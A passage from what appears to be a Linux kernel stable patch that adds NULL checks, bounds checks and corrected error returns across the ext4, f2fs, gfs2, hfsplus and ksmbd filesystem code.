+ 		      (gdp->bg_flags & cpu_to_le16(EXT4_BG_BLOCK_UNINIT)))) {
+@@ -2838,6 +2855,8 @@ static int ext4_mb_seq_groups_show(struct seq_file *seq, void *v)
+ 		sizeof(struct ext4_group_info);
+ 
+ 	grinfo = ext4_get_group_info(sb, group);
++	if (!grinfo)
++		return 0;
+ 	/* Load the group info in memory only if not already loaded. */
+ 	if (unlikely(EXT4_MB_GRP_NEED_INIT(grinfo))) {
+ 		err = ext4_mb_load_buddy(sb, group, &e4b);
+@@ -2848,7 +2867,7 @@ static int ext4_mb_seq_groups_show(struct seq_file *seq, void *v)
+ 		buddy_loaded = 1;
+ 	}
+ 
+-	memcpy(&sg, ext4_get_group_info(sb, group), i);
++	memcpy(&sg, grinfo, i);
+ 
+ 	if (buddy_loaded)
+ 		ext4_mb_unload_buddy(&e4b);
+@@ -3210,8 +3229,12 @@ static int ext4_mb_init_backend(struct super_block *sb)
+ 
+ err_freebuddy:
+ 	cachep = get_groupinfo_cache(sb->s_blocksize_bits);
+-	while (i-- > 0)
+-		kmem_cache_free(cachep, ext4_get_group_info(sb, i));
++	while (i-- > 0) {
++		struct ext4_group_info *grp = ext4_get_group_info(sb, i);
++
++		if (grp)
++			kmem_cache_free(cachep, grp);
++	}
+ 	i = sbi->s_group_info_size;
+ 	rcu_read_lock();
+ 	group_info = rcu_dereference(sbi->s_group_info);
+@@ -3525,6 +3548,8 @@ int ext4_mb_release(struct super_block *sb)
+ 		for (i = 0; i < ngroups; i++) {
+ 			cond_resched();
+ 			grinfo = ext4_get_group_info(sb, i);
++			if (!grinfo)
++				continue;
+ 			mb_group_bb_bitmap_free(grinfo);
+ 			ext4_lock_group(sb, i);
+ 			count = ext4_mb_cleanup_pa(grinfo);
+@@ -3993,6 +4018,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 				struct ext4_allocation_request *ar)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(ac->ac_sb);
++	struct ext4_super_block *es = sbi->s_es;
+ 	int bsbits, max;
+ 	ext4_lblk_t end;
+ 	loff_t size, start_off;
+@@ -4188,18 +4214,21 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	ac->ac_g_ex.fe_len = EXT4_NUM_B2C(sbi, size);
+ 
+ 	/* define goal start in order to merge */
+-	if (ar->pright && (ar->lright == (start + size))) {
++	if (ar->pright && (ar->lright == (start + size)) &&
++	    ar->pright >= size &&
++	    ar->pright - size >= le32_to_cpu(es->s_first_data_block)) {
+ 		/* merge to the right */
+ 		ext4_get_group_no_and_offset(ac->ac_sb, ar->pright - size,
+-						&ac->ac_f_ex.fe_group,
+-						&ac->ac_f_ex.fe_start);
++						&ac->ac_g_ex.fe_group,
++						&ac->ac_g_ex.fe_start);
+ 		ac->ac_flags |= EXT4_MB_HINT_TRY_GOAL;
+ 	}
+-	if (ar->pleft && (ar->lleft + 1 == start)) {
++	if (ar->pleft && (ar->lleft + 1 == start) &&
++	    ar->pleft + 1 < ext4_blocks_count(es)) {
+ 		/* merge to the left */
+ 		ext4_get_group_no_and_offset(ac->ac_sb, ar->pleft + 1,
+-						&ac->ac_f_ex.fe_group,
+-						&ac->ac_f_ex.fe_start);
++						&ac->ac_g_ex.fe_group,
++						&ac->ac_g_ex.fe_start);
+ 		ac->ac_flags |= EXT4_MB_HINT_TRY_GOAL;
+ 	}
+ 
+@@ -4292,6 +4321,7 @@ static void ext4_mb_use_inode_pa(struct ext4_allocation_context *ac,
+ 	BUG_ON(start < pa->pa_pstart);
+ 	BUG_ON(end > pa->pa_pstart + EXT4_C2B(sbi, pa->pa_len));
+ 	BUG_ON(pa->pa_free < len);
++	BUG_ON(ac->ac_b_ex.fe_len <= 0);
+ 	pa->pa_free -= len;
+ 
+ 	mb_debug(ac->ac_sb, "use %llu/%d from inode pa %p\n", start, len, pa);
+@@ -4454,6 +4484,8 @@ static void ext4_mb_generate_from_freelist(struct super_block *sb, void *bitmap,
+ 	struct ext4_free_data *entry;
+ 
+ 	grp = ext4_get_group_info(sb, group);
++	if (!grp)
++		return;
+ 	n = rb_first(&(grp->bb_free_root));
+ 
+ 	while (n) {
+@@ -4481,6 +4513,9 @@ void ext4_mb_generate_from_pa(struct super_block *sb, void *bitmap,
+ 	int preallocated = 0;
+ 	int len;
+ 
++	if (!grp)
++		return;
++
+ 	/* all form of preallocation discards first load group,
+ 	 * so the only competing code is preallocation use.
+ 	 * we don't need any locking here
+@@ -4616,10 +4651,8 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 	pa = ac->ac_pa;
+ 
+ 	if (ac->ac_b_ex.fe_len < ac->ac_g_ex.fe_len) {
+-		int winl;
+-		int wins;
+-		int win;
+-		int offs;
++		int new_bex_start;
++		int new_bex_end;
+ 
+ 		/* we can't allocate as much as normalizer wants.
+ 		 * so, found space must get proper lstart
+@@ -4627,26 +4660,40 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 		BUG_ON(ac->ac_g_ex.fe_logical > ac->ac_o_ex.fe_logical);
+ 		BUG_ON(ac->ac_g_ex.fe_len < ac->ac_o_ex.fe_len);
+ 
+-		/* we're limited by original request in that
+-		 * logical block must be covered any way
+-		 * winl is window we can move our chunk within */
+-		winl = ac->ac_o_ex.fe_logical - ac->ac_g_ex.fe_logical;
++		/*
++		 * Use the below logic for adjusting best extent as it keeps
++		 * fragmentation in check while ensuring logical range of best
++		 * extent doesn't overflow out of goal extent:
++		 *
++		 * 1. Check if best ex can be kept at end of goal and still
++		 *    cover original start
++		 * 2. Else, check if best ex can be kept at start of goal and
++		 *    still cover original start
++		 * 3. Else, keep the best ex at start of original request.
++		 */
++		new_bex_end = ac->ac_g_ex.fe_logical +
++			EXT4_C2B(sbi, ac->ac_g_ex.fe_len);
++		new_bex_start = new_bex_end - EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
++		if (ac->ac_o_ex.fe_logical >= new_bex_start)
++			goto adjust_bex;
+ 
+-		/* also, we should cover whole original request */
+-		wins = EXT4_C2B(sbi, ac->ac_b_ex.fe_len - ac->ac_o_ex.fe_len);
++		new_bex_start = ac->ac_g_ex.fe_logical;
++		new_bex_end =
++			new_bex_start + EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
++		if (ac->ac_o_ex.fe_logical < new_bex_end)
++			goto adjust_bex;
+ 
+-		/* the smallest one defines real window */
+-		win = min(winl, wins);
++		new_bex_start = ac->ac_o_ex.fe_logical;
++		new_bex_end =
++			new_bex_start + EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
+ 
+-		offs = ac->ac_o_ex.fe_logical %
+-			EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
+-		if (offs && offs < win)
+-			win = offs;
++adjust_bex:
++		ac->ac_b_ex.fe_logical = new_bex_start;
+ 
+-		ac->ac_b_ex.fe_logical = ac->ac_o_ex.fe_logical -
+-			EXT4_NUM_B2C(sbi, win);
+ 		BUG_ON(ac->ac_o_ex.fe_logical < ac->ac_b_ex.fe_logical);
+ 		BUG_ON(ac->ac_o_ex.fe_len > ac->ac_b_ex.fe_len);
++		BUG_ON(new_bex_end > (ac->ac_g_ex.fe_logical +
++				      EXT4_C2B(sbi, ac->ac_g_ex.fe_len)));
+ 	}
+ 
+ 	/* preallocation can change ac_b_ex, thus we store actually
+@@ -4672,6 +4719,8 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 
+ 	ei = EXT4_I(ac->ac_inode);
+ 	grp = ext4_get_group_info(sb, ac->ac_b_ex.fe_group);
++	if (!grp)
++		return;
+ 
+ 	pa->pa_obj_lock = &ei->i_prealloc_lock;
+ 	pa->pa_inode = ac->ac_inode;
+@@ -4725,6 +4774,8 @@ ext4_mb_new_group_pa(struct ext4_allocation_context *ac)
+ 	atomic_add(pa->pa_free, &EXT4_SB(sb)->s_mb_preallocated);
+ 
+ 	grp = ext4_get_group_info(sb, ac->ac_b_ex.fe_group);
++	if (!grp)
++		return;
+ 	lg = ac->ac_lg;
+ 	BUG_ON(lg == NULL);
+ 
+@@ -4853,6 +4904,8 @@ ext4_mb_discard_group_preallocations(struct super_block *sb,
+ 	int err;
+ 	int free = 0;
+ 
++	if (!grp)
++		return 0;
+ 	mb_debug(sb, "discard preallocation for group %u\n", group);
+ 	if (list_empty(&grp->bb_prealloc_list))
+ 		goto out_dbg;
+@@ -5090,6 +5143,9 @@ static inline void ext4_mb_show_pa(struct super_block *sb)
+ 		struct ext4_prealloc_space *pa;
+ 		ext4_grpblk_t start;
+ 		struct list_head *cur;
++
++		if (!grp)
++			continue;
+ 		ext4_lock_group(sb, i);
+ 		list_for_each(cur, &grp->bb_prealloc_list) {
+ 			pa = list_entry(cur, struct ext4_prealloc_space,
+@@ -5895,6 +5951,7 @@ static void ext4_mb_clear_bb(handle_t *handle, struct inode *inode,
+ 	struct buffer_head *bitmap_bh = NULL;
+ 	struct super_block *sb = inode->i_sb;
+ 	struct ext4_group_desc *gdp;
++	struct ext4_group_info *grp;
+ 	unsigned int overflow;
+ 	ext4_grpblk_t bit;
+ 	struct buffer_head *gd_bh;
+@@ -5920,8 +5977,8 @@ do_more:
+ 	overflow = 0;
+ 	ext4_get_group_no_and_offset(sb, block, &block_group, &bit);
+ 
+-	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(
+-			ext4_get_group_info(sb, block_group))))
++	grp = ext4_get_group_info(sb, block_group);
++	if (unlikely(!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp)))
+ 		return;
+ 
+ 	/*
+@@ -6523,6 +6580,8 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 
+ 	for (group = first_group; group <= last_group; group++) {
+ 		grp = ext4_get_group_info(sb, group);
++		if (!grp)
++			continue;
+ 		/* We only do this if the grp has never been initialized */
+ 		if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
+ 			ret = ext4_mb_init_group(sb, group, GFP_NOFS);
+diff --git a/fs/ext4/mmp.c b/fs/ext4/mmp.c
+index 23930ed3cbda6..24b3beddaf4ba 100644
+--- a/fs/ext4/mmp.c
++++ b/fs/ext4/mmp.c
+@@ -296,6 +296,7 @@ int ext4_multi_mount_protect(struct super_block *sb,
+ 	if (mmp_block < le32_to_cpu(es->s_first_data_block) ||
+ 	    mmp_block >= ext4_blocks_count(es)) {
+ 		ext4_warning(sb, "Invalid MMP block in superblock");
++		retval = -EINVAL;
+ 		goto failed;
+ 	}
+ 
+@@ -321,6 +322,7 @@ int ext4_multi_mount_protect(struct super_block *sb,
+ 
+ 	if (seq == EXT4_MMP_SEQ_FSCK) {
+ 		dump_mmp_msg(sb, mmp, "fsck is running on the filesystem");
++		retval = -EBUSY;
+ 		goto failed;
+ 	}
+ 
+@@ -334,6 +336,7 @@ int ext4_multi_mount_protect(struct super_block *sb,
+ 
+ 	if (schedule_timeout_interruptible(HZ * wait_time) != 0) {
+ 		ext4_warning(sb, "MMP startup interrupted, failing mount\n");
++		retval = -ETIMEDOUT;
+ 		goto failed;
+ 	}
+ 
+@@ -344,6 +347,7 @@ int ext4_multi_mount_protect(struct super_block *sb,
+ 	if (seq != le32_to_cpu(mmp->mmp_seq)) {
+ 		dump_mmp_msg(sb, mmp,
+ 			     "Device is already active on another node.");
++		retval = -EBUSY;
+ 		goto failed;
+ 	}
+ 
+@@ -367,6 +371,7 @@ skip:
+ 	 */
+ 	if (schedule_timeout_interruptible(HZ * wait_time) != 0) {
+ 		ext4_warning(sb, "MMP startup interrupted, failing mount");
++		retval = -ETIMEDOUT;
+ 		goto failed;
+ 	}
+ 
+@@ -377,6 +382,7 @@ skip:
+ 	if (seq != le32_to_cpu(mmp->mmp_seq)) {
+ 		dump_mmp_msg(sb, mmp,
+ 			     "Device is already active on another node.");
++		retval = -EBUSY;
+ 		goto failed;
+ 	}
+ 
+@@ -396,6 +402,7 @@ skip:
+ 		EXT4_SB(sb)->s_mmp_tsk = NULL;
+ 		ext4_warning(sb, "Unable to create kmmpd thread for %s.",
+ 			     sb->s_id);
++		retval = -ENOMEM;
+ 		goto failed;
+ 	}
+ 
+@@ -403,5 +410,5 @@ skip:
+ 
+ failed:
+ 	brelse(bh);
+-	return 1;
++	return retval;
+ }
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index d542f068ca99f..bd2e803d653f7 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -1049,6 +1049,8 @@ void ext4_mark_group_bitmap_corrupted(struct super_block *sb,
+ 	struct ext4_group_desc *gdp = ext4_get_group_desc(sb, group, NULL);
+ 	int ret;
+ 
++	if (!grp || !gdp)
++		return;
+ 	if (flags & EXT4_GROUP_INFO_BBITMAP_CORRUPT) {
+ 		ret = ext4_test_and_set_bit(EXT4_GROUP_INFO_BBITMAP_CORRUPT_BIT,
+ 					    &grp->bb_state);
+@@ -5281,9 +5283,11 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 			  ext4_has_feature_orphan_present(sb) ||
+ 			  ext4_has_feature_journal_needs_recovery(sb));
+ 
+-	if (ext4_has_feature_mmp(sb) && !sb_rdonly(sb))
+-		if (ext4_multi_mount_protect(sb, le64_to_cpu(es->s_mmp_block)))
++	if (ext4_has_feature_mmp(sb) && !sb_rdonly(sb)) {
++		err = ext4_multi_mount_protect(sb, le64_to_cpu(es->s_mmp_block));
++		if (err)
+ 			goto failed_mount3a;
++	}
+ 
+ 	/*
+ 	 * The first inode we look at is the journal inode.  Don't try
+@@ -6337,6 +6341,7 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	struct ext4_mount_options old_opts;
+ 	ext4_group_t g;
+ 	int err = 0;
++	int enable_rw = 0;
+ #ifdef CONFIG_QUOTA
+ 	int enable_quota = 0;
+ 	int i, j;
+@@ -6523,13 +6528,13 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 			if (err)
+ 				goto restore_opts;
+ 
+-			sb->s_flags &= ~SB_RDONLY;
+-			if (ext4_has_feature_mmp(sb))
+-				if (ext4_multi_mount_protect(sb,
+-						le64_to_cpu(es->s_mmp_block))) {
+-					err = -EROFS;
++			enable_rw = 1;
++			if (ext4_has_feature_mmp(sb)) {
++				err = ext4_multi_mount_protect(sb,
++						le64_to_cpu(es->s_mmp_block));
++				if (err)
+ 					goto restore_opts;
+-				}
++			}
+ #ifdef CONFIG_QUOTA
+ 			enable_quota = 1;
+ #endif
+@@ -6582,6 +6587,9 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	if (!test_opt(sb, BLOCK_VALIDITY) && sbi->s_system_blks)
+ 		ext4_release_system_zone(sb);
+ 
++	if (enable_rw)
++		sb->s_flags &= ~SB_RDONLY;
++
+ 	if (!ext4_has_feature_mmp(sb) || sb_rdonly(sb))
+ 		ext4_stop_mmpd(sbi);
+ 
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index 0c82dae082aa9..5df04ed010cae 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -322,8 +322,15 @@ static int __f2fs_write_meta_page(struct page *page,
+ 
+ 	trace_f2fs_writepage(page, META);
+ 
+-	if (unlikely(f2fs_cp_error(sbi)))
++	if (unlikely(f2fs_cp_error(sbi))) {
++		if (is_sbi_flag_set(sbi, SBI_IS_CLOSE)) {
++			ClearPageUptodate(page);
++			dec_page_count(sbi, F2FS_DIRTY_META);
++			unlock_page(page);
++			return 0;
++		}
+ 		goto redirty_out;
++	}
+ 	if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
+ 		goto redirty_out;
+ 	if (wbc->for_reclaim && page->index < GET_SUM_BLOCK(sbi, 0))
+@@ -1301,7 +1308,8 @@ void f2fs_wait_on_all_pages(struct f2fs_sb_info *sbi, int type)
+ 		if (!get_pages(sbi, type))
+ 			break;
+ 
+-		if (unlikely(f2fs_cp_error(sbi)))
++		if (unlikely(f2fs_cp_error(sbi) &&
++			!is_sbi_flag_set(sbi, SBI_IS_CLOSE)))
+ 			break;
+ 
+ 		if (type == F2FS_DIRTY_META)
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index de6b056f090b3..36db9aab47790 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2788,7 +2788,8 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 		 * don't drop any dirty dentry pages for keeping lastest
+ 		 * directory structure.
+ 		 */
+-		if (S_ISDIR(inode->i_mode))
++		if (S_ISDIR(inode->i_mode) &&
++				!is_sbi_flag_set(sbi, SBI_IS_CLOSE))
+ 			goto redirty_out;
+ 		goto out;
+ 	}
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index a0a232551da97..8d7dc76e6f935 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -4435,6 +4435,11 @@ static inline bool f2fs_hw_is_readonly(struct f2fs_sb_info *sbi)
+ 	return false;
+ }
+ 
++static inline bool f2fs_dev_is_readonly(struct f2fs_sb_info *sbi)
++{
++	return f2fs_sb_has_readonly(sbi) || f2fs_hw_is_readonly(sbi);
++}
++
+ static inline bool f2fs_lfs_mode(struct f2fs_sb_info *sbi)
+ {
+ 	return F2FS_OPTION(sbi).fs_mode == FS_MODE_LFS;
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 5cd19fdc10596..7e497f5b349ce 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1811,6 +1811,7 @@ int f2fs_gc(struct f2fs_sb_info *sbi, struct f2fs_gc_control *gc_control)
+ 		.iroot = RADIX_TREE_INIT(gc_list.iroot, GFP_NOFS),
+ 	};
+ 	unsigned int skipped_round = 0, round = 0;
++	unsigned int upper_secs;
+ 
+ 	trace_f2fs_gc_begin(sbi->sb, gc_type, gc_control->no_bg_gc,
+ 				gc_control->nr_free_secs,
+@@ -1896,8 +1897,13 @@ retry:
+ 		}
+ 	}
+ 
+-	/* Write checkpoint to reclaim prefree segments */
+-	if (free_sections(sbi) < NR_CURSEG_PERSIST_TYPE &&
++	__get_secs_required(sbi, NULL, &upper_secs, NULL);
++
++	/*
++	 * Write checkpoint to reclaim prefree segments.
++	 * We need more three extra sections for writer's data/node/dentry.
++	 */
++	if (free_sections(sbi) <= upper_secs + NR_GC_CHECKPOINT_SECS &&
+ 				prefree_segments(sbi)) {
+ 		ret = f2fs_write_checkpoint(sbi, &cpc);
+ 		if (ret)
+diff --git a/fs/f2fs/gc.h b/fs/f2fs/gc.h
+index ca84024b9c9e7..47357101b03cd 100644
+--- a/fs/f2fs/gc.h
++++ b/fs/f2fs/gc.h
+@@ -30,6 +30,8 @@
+ /* Search max. number of dirty segments to select a victim segment */
+ #define DEF_MAX_VICTIM_SEARCH 4096 /* covers 8GB */
+ 
++#define NR_GC_CHECKPOINT_SECS (3)	/* data/node/dentry sections */
++
+ struct f2fs_gc_kthread {
+ 	struct task_struct *f2fs_gc_task;
+ 	wait_queue_head_t gc_wait_queue_head;
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index cd65778fc9822..f3951e8ad3948 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -608,8 +608,12 @@ static inline bool has_curseg_enough_space(struct f2fs_sb_info *sbi,
+ 	return true;
+ }
+ 
+-static inline bool has_not_enough_free_secs(struct f2fs_sb_info *sbi,
+-					int freed, int needed)
++/*
++ * calculate needed sections for dirty node/dentry
++ * and call has_curseg_enough_space
++ */
++static inline void __get_secs_required(struct f2fs_sb_info *sbi,
++		unsigned int *lower_p, unsigned int *upper_p, bool *curseg_p)
+ {
+ 	unsigned int total_node_blocks = get_pages(sbi, F2FS_DIRTY_NODES) +
+ 					get_pages(sbi, F2FS_DIRTY_DENTS) +
+@@ -619,20 +623,37 @@ static inline bool has_not_enough_free_secs(struct f2fs_sb_info *sbi,
+ 	unsigned int dent_secs = total_dent_blocks / CAP_BLKS_PER_SEC(sbi);
+ 	unsigned int node_blocks = total_node_blocks % CAP_BLKS_PER_SEC(sbi);
+ 	unsigned int dent_blocks = total_dent_blocks % CAP_BLKS_PER_SEC(sbi);
+-	unsigned int free, need_lower, need_upper;
++
++	if (lower_p)
++		*lower_p = node_secs + dent_secs;
++	if (upper_p)
++		*upper_p = node_secs + dent_secs +
++			(node_blocks ? 1 : 0) + (dent_blocks ? 1 : 0);
++	if (curseg_p)
++		*curseg_p = has_curseg_enough_space(sbi,
++				node_blocks, dent_blocks);
++}
++
++static inline bool has_not_enough_free_secs(struct f2fs_sb_info *sbi,
++					int freed, int needed)
++{
++	unsigned int free_secs, lower_secs, upper_secs;
++	bool curseg_space;
+ 
+ 	if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
+ 		return false;
+ 
+-	free = free_sections(sbi) + freed;
+-	need_lower = node_secs + dent_secs + reserved_sections(sbi) + needed;
+-	need_upper = need_lower + (node_blocks ? 1 : 0) + (dent_blocks ? 1 : 0);
++	__get_secs_required(sbi, &lower_secs, &upper_secs, &curseg_space);
++
++	free_secs = free_sections(sbi) + freed;
++	lower_secs += needed + reserved_sections(sbi);
++	upper_secs += needed + reserved_sections(sbi);
+ 
+-	if (free > need_upper)
++	if (free_secs > upper_secs)
+ 		return false;
+-	else if (free <= need_lower)
++	else if (free_secs <= lower_secs)
+ 		return true;
+-	return !has_curseg_enough_space(sbi, node_blocks, dent_blocks);
++	return !curseg_space;
+ }
+ 
+ static inline bool f2fs_is_checkpoint_ready(struct f2fs_sb_info *sbi)
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index c46533d65372c..b6dad389fa144 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -2258,7 +2258,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (f2fs_readonly(sb) && (*flags & SB_RDONLY))
+ 		goto skip;
+ 
+-	if (f2fs_sb_has_readonly(sbi) && !(*flags & SB_RDONLY)) {
++	if (f2fs_dev_is_readonly(sbi) && !(*flags & SB_RDONLY)) {
+ 		err = -EROFS;
+ 		goto restore_opts;
+ 	}
+diff --git a/fs/gfs2/glops.c b/fs/gfs2/glops.c
+index d78b61ecc1cdf..7762483f5f20f 100644
+--- a/fs/gfs2/glops.c
++++ b/fs/gfs2/glops.c
+@@ -393,6 +393,7 @@ static int inode_go_demote_ok(const struct gfs2_glock *gl)
+ 
+ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ {
++	struct gfs2_sbd *sdp = GFS2_SB(&ip->i_inode);
+ 	const struct gfs2_dinode *str = buf;
+ 	struct timespec64 atime;
+ 	u16 height, depth;
+@@ -439,7 +440,7 @@ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ 	/* i_diskflags and i_eattr must be set before gfs2_set_inode_flags() */
+ 	gfs2_set_inode_flags(inode);
+ 	height = be16_to_cpu(str->di_height);
+-	if (unlikely(height > GFS2_MAX_META_HEIGHT))
++	if (unlikely(height > sdp->sd_max_height))
+ 		goto corrupt;
+ 	ip->i_height = (u8)height;
+ 
+diff --git a/fs/hfsplus/inode.c b/fs/hfsplus/inode.c
+index b675581aa9d0f..399a6354f0cc5 100644
+--- a/fs/hfsplus/inode.c
++++ b/fs/hfsplus/inode.c
+@@ -511,7 +511,11 @@ int hfsplus_cat_read_inode(struct inode *inode, struct hfs_find_data *fd)
+ 	if (type == HFSPLUS_FOLDER) {
+ 		struct hfsplus_cat_folder *folder = &entry.folder;
+ 
+-		WARN_ON(fd->entrylength < sizeof(struct hfsplus_cat_folder));
++		if (fd->entrylength < sizeof(struct hfsplus_cat_folder)) {
++			pr_err("bad catalog folder entry\n");
++			res = -EIO;
++			goto out;
++		}
+ 		hfs_bnode_read(fd->bnode, &entry, fd->entryoffset,
+ 					sizeof(struct hfsplus_cat_folder));
+ 		hfsplus_get_perms(inode, &folder->permissions, 1);
+@@ -531,7 +535,11 @@ int hfsplus_cat_read_inode(struct inode *inode, struct hfs_find_data *fd)
+ 	} else if (type == HFSPLUS_FILE) {
+ 		struct hfsplus_cat_file *file = &entry.file;
+ 
+-		WARN_ON(fd->entrylength < sizeof(struct hfsplus_cat_file));
++		if (fd->entrylength < sizeof(struct hfsplus_cat_file)) {
++			pr_err("bad catalog file entry\n");
++			res = -EIO;
++			goto out;
++		}
+ 		hfs_bnode_read(fd->bnode, &entry, fd->entryoffset,
+ 					sizeof(struct hfsplus_cat_file));
+ 
+@@ -562,6 +570,7 @@ int hfsplus_cat_read_inode(struct inode *inode, struct hfs_find_data *fd)
+ 		pr_err("bad catalog entry used to create inode\n");
+ 		res = -EIO;
+ 	}
++out:
+ 	return res;
+ }
+ 
+@@ -570,6 +579,7 @@ int hfsplus_cat_write_inode(struct inode *inode)
+ 	struct inode *main_inode = inode;
+ 	struct hfs_find_data fd;
+ 	hfsplus_cat_entry entry;
++	int res = 0;
+ 
+ 	if (HFSPLUS_IS_RSRC(inode))
+ 		main_inode = HFSPLUS_I(inode)->rsrc_inode;
+@@ -588,7 +598,11 @@ int hfsplus_cat_write_inode(struct inode *inode)
+ 	if (S_ISDIR(main_inode->i_mode)) {
+ 		struct hfsplus_cat_folder *folder = &entry.folder;
+ 
+-		WARN_ON(fd.entrylength < sizeof(struct hfsplus_cat_folder));
++		if (fd.entrylength < sizeof(struct hfsplus_cat_folder)) {
++			pr_err("bad catalog folder entry\n");
++			res = -EIO;
++			goto out;
++		}
+ 		hfs_bnode_read(fd.bnode, &entry, fd.entryoffset,
+ 					sizeof(struct hfsplus_cat_folder));
+ 		/* simple node checks? */
+@@ -613,7 +627,11 @@ int hfsplus_cat_write_inode(struct inode *inode)
+ 	} else {
+ 		struct hfsplus_cat_file *file = &entry.file;
+ 
+-		WARN_ON(fd.entrylength < sizeof(struct hfsplus_cat_file));
++		if (fd.entrylength < sizeof(struct hfsplus_cat_file)) {
++			pr_err("bad catalog file entry\n");
++			res = -EIO;
++			goto out;
++		}
+ 		hfs_bnode_read(fd.bnode, &entry, fd.entryoffset,
+ 					sizeof(struct hfsplus_cat_file));
+ 		hfsplus_inode_write_fork(inode, &file->data_fork);
+@@ -634,7 +652,7 @@ int hfsplus_cat_write_inode(struct inode *inode)
+ 	set_bit(HFSPLUS_I_CAT_DIRTY, &HFSPLUS_I(inode)->flags);
+ out:
+ 	hfs_find_exit(&fd);
+-	return 0;
++	return res;
+ }
+ 
+ int hfsplus_fileattr_get(struct dentry *dentry, struct fileattr *fa)
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index e3312fbf4c090..b371754540f9c 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -353,7 +353,8 @@ int ksmbd_conn_handler_loop(void *p)
+ 			break;
+ 
+ 		/* 4 for rfc1002 length field */
+-		size = pdu_size + 4;
++		/* 1 for implied bcc[0] */
++		size = pdu_size + 4 + 1;
+ 		conn->request_buf = kvmalloc(size, GFP_KERNEL);
+ 		if (!conn->request_buf)
+ 			break;
+diff --git a/fs/ksmbd/oplock.c b/fs/ksmbd/oplock.c
+index d7d47b82451db..c7466546e59be 100644
+--- a/fs/ksmbd/oplock.c
++++ b/fs/ksmbd/oplock.c
+@@ -1449,11 +1449,12 @@ struct lease_ctx_info *parse_lease_state(void *open_req)
+  * smb2_find_context_vals() - find a particular context info in open request
+  * @open_req:	buffer containing smb2 file open(create) request
+  * @tag:	context name to search for
++ * @tag_len:	the length of tag
+  *
+  * Return:	pointer to requested context, NULL if @str context not found
+  *		or error pointer if name length is invalid.
+  */
+-struct create_context *smb2_find_context_vals(void *open_req, const char *tag)
++struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len)
+ {
+ 	struct create_context *cc;
+ 	unsigned int next = 0;
+@@ -1492,7 +1493,7 @@ struct create_context *smb2_find_context_vals(void *open_req, const char *tag)
+ 			return ERR_PTR(-EINVAL);
+ 
+ 		name = (char *)cc + name_off;
+-		if (memcmp(name, tag, name_len) == 0)
++		if (name_len == tag_len && !memcmp(name, tag, name_len))
+ 			return cc;
+ 
+ 		remain_len -= next;
+diff --git a/fs/ksmbd/oplock.h b/fs/ksmbd/oplock.h
+index 09753448f7798..4b0fe6da76940 100644
+--- a/fs/ksmbd/oplock.h
++++ b/fs/ksmbd/oplock.h
+@@ -118,7 +118,7 @@ void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp);
+ void create_mxac_rsp_buf(char *cc, int maximal_access);
+ void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id);
+ void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp);
+-struct create_context *smb2_find_context_vals(void *open_req, const char *str);
++struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len);
+ struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
+ 					  char *lease_key);
+ int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
+diff --git a/fs/ksmbd/smb2misc.c b/fs/ksmbd/smb2misc.c
+index fbdde426dd01d..0ffe663b75906 100644
+--- a/fs/ksmbd/smb2misc.c
++++ b/fs/ksmbd/smb2misc.c
+@@ -416,8 +416,11 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 
+ 		/*
+ 		 * Allow a message that padded to 8byte boundary.
++		 * Linux 4.19.217 with smb 3.0.2 are sometimes
++		 * sending messages where the cls_len is exactly
++		 * 8 bytes less than len.
+ 		 */
+-		if (clc_len < len && (len - clc_len) < 8)
++		if (clc_len < len && (len - clc_len) <= 8)
+ 			goto validate_credit;
+ 
+ 		pr_err_ratelimited(
